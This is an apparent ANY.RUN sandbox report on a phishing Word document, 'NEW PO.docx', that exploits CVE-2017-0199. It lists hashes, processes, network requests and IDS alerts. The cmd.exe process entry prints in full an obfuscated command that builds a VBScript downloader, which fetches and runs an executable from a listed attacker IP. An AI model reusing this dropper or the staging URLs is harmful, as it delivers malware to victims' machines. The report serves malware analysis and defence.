File name:

NEW PO.docx

Full analysis: https://app.any.run/tasks/959850e5-5892-4937-a3ff-682194859568
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 15, 2018, 10:43:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
generated-doc
opendir
trojan
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

93C3E76659E7893FCEF5F63EF1AFC403

SHA1:

BB162586C1A1FAF0D5544F8223748E5ECA6F623E

SHA256:

C37ED90B11B277ADA5CC16671052962A85E4B2CAD61079E45655A2A680C1C93E

SSDEEP:

384:TQeNh+wS115Wp39FG6F7//o5wMAqNciBph:OwAk9GAycGP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Downloads executable files from IP

      • WScript.exe (PID: 948)

    • Downloads executable files from the Internet

      • WScript.exe (PID: 948)

    • Application was dropped or rewritten from another process

      • VUHTXN.eXe (PID: 2388)
      • VUHTXN.eXe (PID: 1048)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2544)

    • Reads Internet Cache Settings

      • mshta.exe (PID: 2544)
      • WINWORD.EXE (PID: 668)
      • WScript.exe (PID: 948)

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 668)

    • Executes scripts

      • cmd.exe (PID: 2080)

    • Reads the machine GUID from the registry

      • WScript.exe (PID: 948)

    • Executable content was dropped or overwritten

      • WScript.exe (PID: 948)

    • Application launched itself

      • VUHTXN.eXe (PID: 1048)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 668)

    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 668)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 668)

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 668)

    • Reads internet explorer settings

      • mshta.exe (PID: 2544)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x344b4b79
ZipCompressedSize: 398
ZipUncompressedSize: 1474
ZipFileName: [Content_Types].xml

XMP

Creator: Olachi

XML

LastModifiedBy: Olachi
RevisionNumber: 2
CreateDate: 2018:11:08 13:02:00Z
ModifyDate: 2018:11:08 13:02:00Z
Template: Normal.dotm
TotalEditTime: -
Pages: 1
Words: 10
Characters: 61
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 70
SharedDoc: No
HyperlinksChanged: No
AppVersion: 14
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
6
Malicious processes
0
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start winword.exe mshta.exe no specs cmd.exe no specs wscript.exe vuhtxn.exe no specs vuhtxn.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
668"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\NEW PO.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.5123.5000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
948"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\UKUOJZ.vBS" C:\Windows\System32\WScript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1048"C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe" C:\Users\admin\AppData\Local\Temp\VUHTXN.eXeWScript.exe
User:
admin
Company:
tynepc
Integrity Level:
MEDIUM
Description:
quincubital
Exit code:
0
Version:
5.07
Modules
Images
c:\users\admin\appdata\local\temp\vuhtxn.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2080"C:\Windows\System32\cmd.exe" /c CD %temp% & @echo set S2zB4rN4jB5pO0tY9pG3qC3nP7xK1l = createobject("wscript.shell") >UKUOJZ.vBS & @echo Dim M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o >>UKUOJZ.vBS & @echo Dim U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q >>UKUOJZ.vBS & @echo Dim W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p >>UKUOJZ.vBS & @echo Dim G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t >>UKUOJZ.vBS & @echo M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o = "http://31.184.198.161/~winvps/1_com/putt/tny.exe" >>UKUOJZ.vBS & @echo U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q = "VUHTXN.eXe" >>UKUOJZ.vBS & @echo Set W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p = CreateObject("MSXML2.XMLHTTP") >>UKUOJZ.vBS & @echo W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.Open "GET", M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o, False >>UKUOJZ.vBS & @echo W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.send ("") >>UKUOJZ.vBS & @echo If W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.Status = 200 Then >>UKUOJZ.vBS & @echo Set G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t = CreateObject("ADODB.Stream") >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Open >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Type = 1 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Write W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.ResponseBody >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Position = 0 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.SaveToFile U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q, 2 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Close >>UKUOJZ.vBS & @echo Set nE= Nothing >>UKUOJZ.vBS & @echo End If >>UKUOJZ.vBS & @echo Set W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p = Nothing >>UKUOJZ.vBS & @echo WScript.Sleep(5000) >>UKUOJZ.VBs& @echo S2zB4rN4jB5pO0tY9pG3qC3nP7xK1l.run(U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q) >>UKUOJZ.vBS & sTaRt UKUOJZ.vbs C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2388C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe" C:\Users\admin\AppData\Local\Temp\VUHTXN.eXeVUHTXN.eXe
User:
admin
Company:
tynepc
Integrity Level:
MEDIUM
Description:
quincubital
Exit code:
0
Version:
5.07
Modules
Images
c:\users\admin\appdata\local\temp\vuhtxn.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2544C:\Windows\System32\mshta.exe -EmbeddingC:\Windows\System32\mshta.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\mshtml.dll
Total events
2 521
Read events
2 102
Write events
405
Delete events
14

Modification events

(PID) Process:(668) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:5i1
Value:
356931009C020000010000000000000000000000
(PID) Process:(668) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(668) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(668) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1299120168
(PID) Process:(668) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1299120250
(PID) Process:(668) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1299120251
(PID) Process:(668) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:FontInfoCacheW
Value:
6000000060000000F5FFFFFF000000000000000000000000BC02000000000000004000225400610068006F006D006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D0000000B000000020000000200000000000000060000001A000000BC0200000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C0290000000000000001000000000028200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D0000000B0000000200000002000000000000000500000017000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C02900000000000000010000000000282006000000F7FFFFFF0000000000000000000000009001000000000000004000225400610068006F006D006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090000000200000002000000000000000400000013000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C02900000000000000010000000000282005000000
(PID) Process:(668) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
9C02000078FE3418D07CD40100000000
(PID) Process:(668) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:sq1
Value:
737131009C02000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(668) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:sq1
Value:
737131009C02000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
Executable files
2
Suspicious files
25
Text files
35
Unknown types
4

Dropped files

PID
Process
Filename
Type
668WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR61A6.tmp.cvr
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{D3890850-C0D3-46E8-AEF4-580DA91BDD8F}
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{9F57A54E-C5C6-4EA9-B636-133A6245DD16}
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\792D9837.doc
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\Desktop\~$NEW PO.docxpgc
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1F264BB.emfemf
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{B1A1A2D6-989A-43A4-8E96-50EFBDA29586}.FSDbinary
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSFbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
5
DNS requests
1
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
668
WINWORD.EXE
GET
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
HEAD
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
GET
304
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
HEAD
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
HEAD
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
GET
304
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
GET
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.hta
RU
html
2.29 Kb
suspicious
948
WScript.exe
GET
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.exe
RU
executable
558 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
668
WINWORD.EXE
104.28.15.54:443
urlz.fr
Cloudflare Inc
US
shared
856
svchost.exe
104.28.15.54:443
urlz.fr
Cloudflare Inc
US
shared
668
WINWORD.EXE
31.184.198.161:80
Petersburg Internet Network ltd.
RU
suspicious
948
WScript.exe
31.184.198.161:80
Petersburg Internet Network ltd.
RU
suspicious

DNS requests

Domain
IP
Reputation
urlz.fr
  • 104.28.15.54
  • 104.28.14.54
shared

Threats

PID
Process
Class
Message
668
WINWORD.EXE
A Network Trojan was detected
ET CURRENT_EVENTS CVE-2017-0199 Common Obfus Stage 2 DL
668
WINWORD.EXE
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
668
WINWORD.EXE
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
668
WINWORD.EXE
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
948
WScript.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
948
WScript.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
948
WScript.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
948
WScript.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
668
WINWORD.EXE
Attempted User Privilege Gain
ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
NEW PO.docx